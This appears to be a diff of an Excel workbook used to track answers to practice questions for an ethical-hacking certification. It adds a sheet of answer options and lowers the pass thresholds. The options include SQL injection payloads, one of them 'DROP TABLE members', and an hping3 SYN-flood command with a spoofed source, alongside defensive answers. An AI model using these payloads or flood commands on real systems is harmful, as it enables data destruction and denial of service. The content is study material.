+    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" activeTab="5" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="1" sheetId="1" r:id="rId1"/>
@@ -18,6 +18,7 @@
     <sheet name="3" sheetId="4" r:id="rId3"/>
     <sheet name="4" sheetId="2" r:id="rId4"/>
     <sheet name="5" sheetId="7" r:id="rId5"/>
+    <sheet name="6" sheetId="8" r:id="rId6"/>
   </sheets>
   <calcPr calcId="191029"/>
   <extLst>
@@ -29,7 +30,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="690" uniqueCount="503">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1004" uniqueCount="665">
   <si>
     <t>Slno</t>
   </si>
@@ -1538,13 +1539,499 @@
   </si>
   <si>
     <t>Dark web footprinting</t>
+  </si>
+  <si>
+    <t>netcat</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> [related:]</t>
+  </si>
+  <si>
+    <t>-sA</t>
+  </si>
+  <si>
+    <t>RIPE</t>
+  </si>
+  <si>
+    <t>Hit-list scanning technique.</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> Evilginx</t>
+  </si>
+  <si>
+    <t>Watering hole attack</t>
+  </si>
+  <si>
+    <t>. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.</t>
+  </si>
+  <si>
+    <t>select * from Users where UserName = ‘attack’ ’ or 1=1 -- and UserPassword = ‘123456’</t>
+  </si>
+  <si>
+    <t>Use Marie’s public key to encrypt the message.</t>
+  </si>
+  <si>
+    <t>SNMP and he should change it to SNMP V3.</t>
+  </si>
+  <si>
+    <t>-sV</t>
+  </si>
+  <si>
+    <t>Limit the administrator or root-level access to the minimum number of users.</t>
+  </si>
+  <si>
+    <t>The -D flag</t>
+  </si>
+  <si>
+    <t>Use of command-line interface</t>
+  </si>
+  <si>
+    <t>Man-in-the-cloud (MITC) attack</t>
+  </si>
+  <si>
+    <t>This php file silently executes the code and grabs the user’s session cookie and session ID.</t>
+  </si>
+  <si>
+    <t>ACK flag probe scan</t>
+  </si>
+  <si>
+    <t>The service is LDAP, and you must change it to 636, which is LDAPS.</t>
+  </si>
+  <si>
+    <t>Implement cognitive radios in the physical layer</t>
+  </si>
+  <si>
+    <t>You should check your ARP table and see if there is one IP address with two different MAC addresses.</t>
+  </si>
+  <si>
+    <t>Bryan’s public key; Alice’s public key</t>
+  </si>
+  <si>
+    <t>Pass the hash</t>
+  </si>
+  <si>
+    <t>Encrypt data client-side before uploading to the cloud and retain control of the encryption keys.</t>
+  </si>
+  <si>
+    <t>Initiating DNS tunneling to communicate with the command-and-control server.</t>
+  </si>
+  <si>
+    <t>Implementing a brute force attack to verify system vulnerability</t>
+  </si>
+  <si>
+    <t>Test 1: The test was conducted because SYN and ECN-Echo flags enabled to allow the hacker to probe the nature of the response and subsequently determine the OS fingerprint</t>
+  </si>
+  <si>
+    <t>z=400, u=4: The attacker constructs 4 SQL payloads, each focusing on tables with 400 records, influencing all columns of all tables.</t>
+  </si>
+  <si>
+    <t>Ping of Death attack</t>
+  </si>
+  <si>
+    <t>Writing YARA rules specifically to identify the goodware files triggering false positives</t>
+  </si>
+  <si>
+    <t>Man-in-the-middle Attack Using Forged ICMP and ARP Spoofing</t>
+  </si>
+  <si>
+    <t>Adopt a Continual/Adaptive Security Strategy involving ongoing prediction, prevention, detection, and response actions to ensure comprehensive computer network defense.</t>
+  </si>
+  <si>
+    <t>The hacker attempts to bypass the special character filter by encoding his malicious input, which could potentially enable him to successfully inject damaging SQL queries.</t>
+  </si>
+  <si>
+    <t>' OR 'a'='a; DROP TABLE members; --: This payload combines the manipulation of the WHERE clause with a destructive action, causing data loss</t>
+  </si>
+  <si>
+    <t>Invalidate the TGS the attacker acquired</t>
+  </si>
+  <si>
+    <t>Use network segmentation to isolate IoMT devices from the main network.</t>
+  </si>
+  <si>
+    <t>Implement a mobile device management solution that restricts the installation of non-approved applications.</t>
+  </si>
+  <si>
+    <t>Unauthorized users may perform privilege escalation using unnecessarily created accounts</t>
+  </si>
+  <si>
+    <t>Both the organization and John share responsibility because they did not adequately manage the vulnerabilities.</t>
+  </si>
+  <si>
+    <t>The secure LDAP connection was not properly initialized due to a lack of 'use_ssl = True' in the server object creation.</t>
+  </si>
+  <si>
+    <t>Display a captive portal page that warns users about the possibility of Evil Twin attacks</t>
+  </si>
+  <si>
+    <t>dnsrecon -r 162.241.216.0/24 -n nsl.example.com -t std</t>
+  </si>
+  <si>
+    <t>Switch to an enumeration tool that supports IPv6</t>
+  </si>
+  <si>
+    <t>Use the IDLE/IPID header scan technique with the command "-sI"</t>
+  </si>
+  <si>
+    <t>Organize regular employee awareness training regarding social engineering techniques and preventive measures</t>
+  </si>
+  <si>
+    <t>m=90, b=15: The server can manage 90 connections per second, but the attacker's 100 connections exceed this, and with each connection held up for 15 seconds, the attack duration could be significant.</t>
+  </si>
+  <si>
+    <t>The total number of high, medium, and low-risk vulnerabilities detected throughout the network.</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> Applying the latest patches and updating software programs </t>
+  </si>
+  <si>
+    <t>Request a service ticket for the service principal name of the target service account</t>
+  </si>
+  <si>
+    <t>Conduct a vulnerability assessment specifically for the IoT devices.</t>
+  </si>
+  <si>
+    <t>Probe the IPC share by attempting to brute force admin credentials</t>
+  </si>
+  <si>
+    <t>Advise using a dedicated network for the smart home system, separate from the home's main Wi-Fi network.</t>
+  </si>
+  <si>
+    <t>Suppress detailed error messages, as they can expose sensitive information.</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Implement the Diffie-Hellman protocol for secure key exchange. </t>
+  </si>
+  <si>
+    <t xml:space="preserve">Use client-side encryption and manage encryption keys independently of the CSP. </t>
+  </si>
+  <si>
+    <t>Thin Whois model with a malfunctioning server</t>
+  </si>
+  <si>
+    <t>Data encryption with AES-256: Provides high security with better performance than 3DES, but not as fast as other AES key sizes.</t>
+  </si>
+  <si>
+    <t>Deploy a Cloud Access Security Broker (CASB).</t>
+  </si>
+  <si>
+    <t>q=17, T=220: Even though the attacker increases 'q', the total delay ('q*d' = 221 seconds) just surpasses the threshold, possibly activating an alert.</t>
+  </si>
+  <si>
+    <t>WPA2-PSK with AES encryption</t>
+  </si>
+  <si>
+    <t>AES key size=192 bits: This configuration is a balance between options A and B, providing moderate security and performance.</t>
+  </si>
+  <si>
+    <t>Whaling and Targeted Attacks</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Enforce a policy that only allows app installations from approved corporate app stores. </t>
+  </si>
+  <si>
+    <t>The time recipient spent reading the email</t>
+  </si>
+  <si>
+    <t>Enable encryption on the wireless network</t>
+  </si>
+  <si>
+    <t>The attacker should leverage a botnet to launch a Pulse Wave attack, sending high-volume traffic pulses at regular intervals</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Synthetic Identity Theft </t>
+  </si>
+  <si>
+    <t>Conduct comprehensive training sessions for employees on various social engineering methodologies and the risks associated with revealing confidential data.</t>
+  </si>
+  <si>
+    <t>Checking for hardware and software misconfigurations to identify any possible loopholes</t>
+  </si>
+  <si>
+    <t>snmp-check (snmp_enum Module) to gather a wide array of information about the target</t>
+  </si>
+  <si>
+    <t>Base metric represents the inherent qualities of a vulnerability.</t>
+  </si>
+  <si>
+    <t>Implement network segmentation to separate IIoT devices from the rest of the network.</t>
+  </si>
+  <si>
+    <t>Side-Channel Attack</t>
+  </si>
+  <si>
+    <t>Vulnerability scanning software is not immune to software engineering flaws that might lead to serious vulnerabilities being missed</t>
+  </si>
+  <si>
+    <t>Default settings reveal server software type; change these settings</t>
+  </si>
+  <si>
+    <t>Enable WPA2 or WPA3 encryption on the wireless router</t>
+  </si>
+  <si>
+    <t>Dumpster diving in the target company's trash bins for valuable printouts</t>
+  </si>
+  <si>
+    <t>AutoYara - Because it automates the generation of YARA rules from a set of malicious and benign files</t>
+  </si>
+  <si>
+    <t>Utilize a blind injection technique that uses time delays or error signatures to extract information</t>
+  </si>
+  <si>
+    <t>Script Kiddies trying to compromise the system using pre-made scripts.</t>
+  </si>
+  <si>
+    <t>location: This operator finds information for a specific location</t>
+  </si>
+  <si>
+    <t>Analyzing the initial exploitation methods, the adversary used.</t>
+  </si>
+  <si>
+    <t>Jason should use passive reconnaissance techniques such as WHOIS lookups, NS lookups, and web research.</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Implement WPA3 encryption for the store's Wi-Fi network </t>
+  </si>
+  <si>
+    <t>TCP SYN Ping Scan</t>
+  </si>
+  <si>
+    <t>Performing regular server configuration audits</t>
+  </si>
+  <si>
+    <t>Implement IPsec in addition to SSL/TLS.</t>
+  </si>
+  <si>
+    <t>Instant Messenger Applications; verifying the sender's identity before opening any files</t>
+  </si>
+  <si>
+    <t>Insider attacks and the organization should have implemented robust access control and monitoring.</t>
+  </si>
+  <si>
+    <t>Use a Cloud Access Security Broker (CASB).</t>
+  </si>
+  <si>
+    <t>Implement SSL/TLS encryption for data transmission between the IoT device and the mobile app.</t>
+  </si>
+  <si>
+    <t>The target network has a stateful firewall present</t>
+  </si>
+  <si>
+    <t>Unnecessary services could contain vulnerabilities; minimize the attack surface.</t>
+  </si>
+  <si>
+    <t>Utilizing the char encoding function to convert hexadecimal and decimal values into characters that pass-through SQL engine parsing</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Implement 802.1X authentication </t>
+  </si>
+  <si>
+    <t>They are performing an SYN scan to stealthily identify open ports without fully establishing a connection.</t>
+  </si>
+  <si>
+    <t>Connecting the system to the production network during the malware analysis</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Service-based solution offered by an auditing firm </t>
+  </si>
+  <si>
+    <t>Hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood</t>
+  </si>
+  <si>
+    <t>Initiate with Nmap for a ping sweep, then use Metasploit to scan for open ports and services, and finally use Hping3 to perform remote OS fingerprinting.</t>
+  </si>
+  <si>
+    <t>Contact your Internet Service Provider (ISP) for assistance</t>
+  </si>
+  <si>
+    <t>Encrypt the data client-side before uploading to the SaaS environment and manage encryption keys independently.</t>
+  </si>
+  <si>
+    <t>Conduct a vulnerability scan on the open port to identify any potential weaknesses.</t>
+  </si>
+  <si>
+    <t>Metamorphic and Rootkit malware</t>
+  </si>
+  <si>
+    <t>Hybrid Attack</t>
+  </si>
+  <si>
+    <t>RST hijacking</t>
+  </si>
+  <si>
+    <t>bettercap</t>
+  </si>
+  <si>
+    <t>Exploit the NetBIOS Session Service on TCP port 139 to gain unauthorized access to the file system</t>
+  </si>
+  <si>
+    <t>Implement network scanning and monitoring tools</t>
+  </si>
+  <si>
+    <t>It should prevent the app from connecting to any unencrypted Wi-Fi networks.</t>
+  </si>
+  <si>
+    <t>The attacker will exploit the malicious payload delivered to the target organization and establish a foothold.</t>
+  </si>
+  <si>
+    <t>It operates on the principle of least privilege, verifying each request as if it is from an untrusted source, regardless of its location.</t>
+  </si>
+  <si>
+    <t>Apply a digital signature mechanism.</t>
+  </si>
+  <si>
+    <t>Develop a browser exploit to bypass the HTTPOnly restriction, then use a HTML-encoded XSS payload to retrieve the cookies.</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Use Hex encoding to represent the SQL query string </t>
+  </si>
+  <si>
+    <t>Regularly updating and patching the server software</t>
+  </si>
+  <si>
+    <t>h=1987 (prime): The attacker's packet rate exceeds the server's capacity, causing potential unresponsiveness.</t>
+  </si>
+  <si>
+    <t>The program is a keylogger; the team should employ intrusion detection systems and regularly update the system software.</t>
+  </si>
+  <si>
+    <t xml:space="preserve">ntptrace 192.168.1.1 </t>
+  </si>
+  <si>
+    <t>Use UDP Traceroute in the Linux operating system by executing the 'traceroute' command with the destination IP or domain name.</t>
+  </si>
+  <si>
+    <t>ARP Ping Scan</t>
+  </si>
+  <si>
+    <t>Employing a tool like Sublist3r, which is designed to enumerate the subdomains of websites using OSINT</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> f=490: The server can handle 490 SYN packets per second. With 's' exceeding 'f' by 10, the response time shoots up (2^10 = 1024 times the usual response time), indicating a system overload.</t>
+  </si>
+  <si>
+    <t>The tester could execute a Brute Force attack, leveraging the lack of account lockout policy and the verbose error messages to guess the correct credentials.</t>
+  </si>
+  <si>
+    <t>The attacker might be implementing MAC flooding to overwhelm the switch's memory.</t>
+  </si>
+  <si>
+    <t>Deploy network intrusion detection systems (IDS) across the IoT network.</t>
+  </si>
+  <si>
+    <t>Xmas Scan, because it can pass through filters undetected, depending on the security mechanisms installed</t>
+  </si>
+  <si>
+    <t>Error-based SQL Injection</t>
+  </si>
+  <si>
+    <t>Qualys Vulnerability Management</t>
+  </si>
+  <si>
+    <t>Raw Sniffing</t>
+  </si>
+  <si>
+    <t>Apply asymmetric encryption with RSA and use the private key for signing.</t>
+  </si>
+  <si>
+    <t>Ensuring atomicity of operations between checking and using data resources</t>
+  </si>
+  <si>
+    <t>Encrypt all sensitive data stored on the device.</t>
+  </si>
+  <si>
+    <t>Store the potentially malicious program on an external medium, such as a CD-ROM.</t>
+  </si>
+  <si>
+    <t>The hacker might employ a 'blind' SQL Injection attack, taking advantage of the application's true or false responses to extract data bit by bit</t>
+  </si>
+  <si>
+    <t>Applying the Diffie-Hellman protocol to exchange the symmetric key.</t>
+  </si>
+  <si>
+    <t>Implement WPA2 or WPA3 encryption</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Launch a Cross-Site Scripting (XSS) attack, aiming to bypass the client-side sanitization and exploit the exposure of session cookies. </t>
+  </si>
+  <si>
+    <t>User-directed spidering with tools like Burp Suite and WebScarab</t>
+  </si>
+  <si>
+    <t>Investigate for anomalies in file movements or unauthorized data access attempts within your database system</t>
+  </si>
+  <si>
+    <t>The Wi-Fi password is too complex and long.</t>
+  </si>
+  <si>
+    <t>Inject a benign script inline to the form to see if it executes</t>
+  </si>
+  <si>
+    <t>DLL Hijacking</t>
+  </si>
+  <si>
+    <t>Determine the impact of enabling the audit feature.</t>
+  </si>
+  <si>
+    <t>WPA3</t>
+  </si>
+  <si>
+    <t>-PP</t>
+  </si>
+  <si>
+    <t>Side-channel attack</t>
+  </si>
+  <si>
+    <t>2 → 5 → 6 → 1 → 3 → 4</t>
+  </si>
+  <si>
+    <t>Web of trust (WOT)</t>
+  </si>
+  <si>
+    <t>btlejack -f 0x129f3244 -j</t>
+  </si>
+  <si>
+    <t>Period (.)</t>
+  </si>
+  <si>
+    <t>DDoS attack</t>
+  </si>
+  <si>
+    <t>An intruder sends a malicious attachment via email to a target.</t>
+  </si>
+  <si>
+    <t>Verbose failure messages</t>
+  </si>
+  <si>
+    <t>WS-Policy</t>
+  </si>
+  <si>
+    <t>WPA3-Personal</t>
+  </si>
+  <si>
+    <t>Blind SQL injection</t>
+  </si>
+  <si>
+    <t>The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.</t>
+  </si>
+  <si>
+    <t>When an attacker gathers system-level data, including account details and server names</t>
+  </si>
+  <si>
+    <t xml:space="preserve">Spear-phishing attack </t>
+  </si>
+  <si>
+    <t>-D</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> Pharming</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="2" x14ac:knownFonts="1">
+  <fonts count="4" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
       <color theme="1"/>
@@ -1560,6 +2047,20 @@
       <name val="Calibri"/>
       <family val="2"/>
       <scheme val="minor"/>
+    </font>
+    <font>
+      <b/>
+      <sz val="11"/>
+      <color theme="1"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+      <scheme val="minor"/>
+    </font>
+    <font>
+      <b/>
+      <sz val="11"/>
+      <color rgb="FF505050"/>
+      <name val="Roboto Condensed"/>
     </font>
   </fonts>
   <fills count="2">
@@ -1582,7 +2083,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="5">
+  <cellXfs count="8">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center"/>
@@ -1594,6 +2095,11 @@
       <alignment horizontal="center"/>
     </xf>
     <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1"/>
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -1877,7 +2383,7 @@
   <dimension ref="A1:G131"/>
   <sheetViews>
     <sheetView topLeftCell="A121" workbookViewId="0">
-      <selection activeCell="F138" sqref="F138"/>
+      <selection activeCell="J136" sqref="J136"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -3426,7 +3932,7 @@
         <v>125</v>
       </c>
       <c r="G131" t="str">
-        <f>IF(G128&gt;=92,"PASS","FAIL")</f>
+        <f>IF(G128&gt;=90,"PASS","FAIL")</f>
         <v>FAIL</v>
       </c>
     </row>
@@ -3441,7 +3947,7 @@
   <dimension ref="A1:F132"/>
   <sheetViews>
     <sheetView topLeftCell="A118" zoomScaleNormal="100" workbookViewId="0">
-      <selection activeCell="D1" sqref="D1:D1048576"/>
+      <selection activeCell="H136" sqref="H136"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -4990,7 +5496,7 @@
         <v>125</v>
       </c>
       <c r="F132" t="str">
-        <f>IF(F129&gt;=92,"PASS","FAIL")</f>
+        <f>IF(F129&gt;=90,"PASS","FAIL")</f>
         <v>FAIL</v>
       </c>
     </row>
@@ -5004,7 +5510,7 @@
   <dimension ref="A1:F132"/>
   <sheetViews>
     <sheetView topLeftCell="A124" workbookViewId="0">
-      <selection activeCell="B1" sqref="B1:B1048576"/>
+      <selection activeCell="G137" sqref="G137"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -6550,7 +7056,7 @@
         <v>125</v>
       </c>
       <c r="F132" t="str">
-        <f>IF(F129&gt;=92,"PASS","FAIL")</f>
+        <f>IF(F129&gt;=90,"PASS","FAIL")</f>
         <v>FAIL</v>
       </c>
     </row>
@@ -6563,8 +7069,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0300-000000000000}">
   <dimension ref="A1:G107"/>
   <sheetViews>
-    <sheetView workbookViewId="0">
-      <selection activeCell="K12" sqref="K12"/>
+    <sheetView topLeftCell="A94" workbookViewId="0">
+      <selection activeCell="H113" sqref="H113"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -7815,7 +8321,7 @@
         <v>458</v>
       </c>
       <c r="G107" t="str">
-        <f>IF(G104&gt;=92,"PASS","FAIL")</f>
+        <f>IF(G104&gt;=71,"PASS","FAIL")</f>
         <v>FAIL</v>
       </c>
     </row>
@@ -7828,8 +8334,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{FDCC2481-E4D7-4962-8F5A-FE351442F187}">
   <dimension ref="A1:J195"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A181" workbookViewId="0">
-      <selection activeCell="J8" sqref="J8"/>
+    <sheetView topLeftCell="A181" workbookViewId="0">
+      <selection activeCell="J195" sqref="J195"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -10159,7 +10665,7 @@
         <v>458</v>
       </c>
       <c r="J194" t="str">
-        <f>IF(G104&gt;=160,"PASS","FAIL")</f>
+        <f>IF(G104&gt;=136,"PASS","FAIL")</f>
         <v>FAIL</v>
       </c>
     </row>
@@ -10175,4 +10681,3777 @@
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>
+</file>
+
+<file path=xl/worksheets/sheet6.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{E9F365E0-BA31-49F2-BED9-5E9F2D51F116}">
+  <dimension ref="A1:J313"/>
+  <sheetViews>
+    <sheetView tabSelected="1" topLeftCell="A305" workbookViewId="0">
+      <selection activeCell="I297" sqref="I297"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
+  <cols>
+    <col min="1" max="1" width="9.140625" style="1"/>
+    <col min="2" max="2" width="17.5703125" customWidth="1"/>
+    <col min="3" max="3" width="18.42578125" customWidth="1"/>
+    <col min="4" max="4" width="9.140625" customWidth="1"/>
+  </cols>
+  <sheetData>
+    <row r="1" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A1" s="1" t="s">
+        <v>0</v>
+      </c>
+      <c r="B1" t="s">
+        <v>1</v>
+      </c>
+      <c r="C1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="2" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A2" s="1">
+        <v>1</v>
+      </c>
+      <c r="B2" s="5" t="s">
+        <v>481</v>
+      </c>
+      <c r="D2" t="b">
+        <f>IF(B2=C2,TRUE,FALSE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="3" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A3" s="1">
+        <v>2</v>
+      </c>
+      <c r="B3" s="5" t="s">
+        <v>482</v>
+      </c>
+      <c r="D3" t="b">
+        <f t="shared" ref="D3:D66" si="0">IF(B3=C3,TRUE,FALSE)</f>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="4" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A4" s="1">
+        <v>3</v>
+      </c>
+      <c r="B4" s="5" t="s">
+        <v>157</v>
+      </c>
+      <c r="D4" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="5" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A5" s="1">
+        <v>4</v>
+      </c>
+      <c r="B5" s="5" t="s">
+        <v>49</v>
+      </c>
+      <c r="D5" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="6" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A6" s="1">
+        <v>5</v>
+      </c>
+      <c r="B6" s="5" t="s">
+        <v>181</v>
+      </c>
+      <c r="D6" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="7" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A7" s="1">
+        <v>6</v>
+      </c>
+      <c r="B7" s="5" t="s">
+        <v>134</v>
+      </c>
+      <c r="D7" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="8" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A8" s="1">
+        <v>7</v>
+      </c>
+      <c r="B8" s="6" t="s">
+        <v>208</v>
+      </c>
+      <c r="D8" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="9" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A9" s="1">
+        <v>8</v>
+      </c>
+      <c r="B9" s="5" t="s">
+        <v>503</v>
+      </c>
+      <c r="D9" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="10" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A10" s="1">
+        <v>9</v>
+      </c>
+      <c r="B10" s="5" t="s">
+        <v>504</v>
+      </c>
+      <c r="D10" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="11" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A11" s="1">
+        <v>10</v>
+      </c>
+      <c r="B11" s="5" t="s">
+        <v>133</v>
+      </c>
+      <c r="D11" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="12" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A12" s="1">
+        <v>11</v>
+      </c>
+      <c r="B12" s="7" t="s">
+        <v>505</v>
+      </c>
+      <c r="D12" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="13" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A13" s="1">
+        <v>12</v>
+      </c>
+      <c r="B13" s="5" t="s">
+        <v>176</v>
+      </c>
+      <c r="D13" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="14" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A14" s="1">
+        <v>13</v>
+      </c>
+      <c r="B14" s="5" t="s">
+        <v>158</v>
+      </c>
+      <c r="D14" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="15" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A15" s="1">
+        <v>14</v>
+      </c>
+      <c r="B15" s="5" t="s">
+        <v>243</v>
+      </c>
+      <c r="D15" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="16" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A16" s="1">
+        <v>15</v>
+      </c>
+      <c r="B16" s="5" t="s">
+        <v>169</v>
+      </c>
+      <c r="D16" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="17" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A17" s="1">
+        <v>16</v>
+      </c>
+      <c r="B17" s="5" t="s">
+        <v>506</v>
+      </c>
+      <c r="D17" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="18" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A18" s="1">
+        <v>17</v>
+      </c>
+      <c r="B18" s="5" t="s">
+        <v>131</v>
+      </c>
+      <c r="D18" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="19" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A19" s="1">
+        <v>18</v>
+      </c>
+      <c r="B19" s="5" t="s">
+        <v>166</v>
+      </c>
+      <c r="D19" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="20" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A20" s="1">
+        <v>19</v>
+      </c>
+      <c r="B20" s="5" t="s">
+        <v>451</v>
+      </c>
+      <c r="D20" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="21" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A21" s="1">
+        <v>20</v>
+      </c>
+      <c r="B21" s="5" t="s">
+        <v>419</v>
+      </c>
+      <c r="D21" t="b">
+        <f t="shared" si="0"/>
+        <v>0</v>
+      </c>
+    </row>
+    <row r="22" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A22" s="1">
+        <v>21</v>
+      </c>
+      <c r="B22" s="5" t="s">
+        <v>218</v>
+      </c>
+      <c r="D22" t="b">
+        <f t="shared" si="0"/>
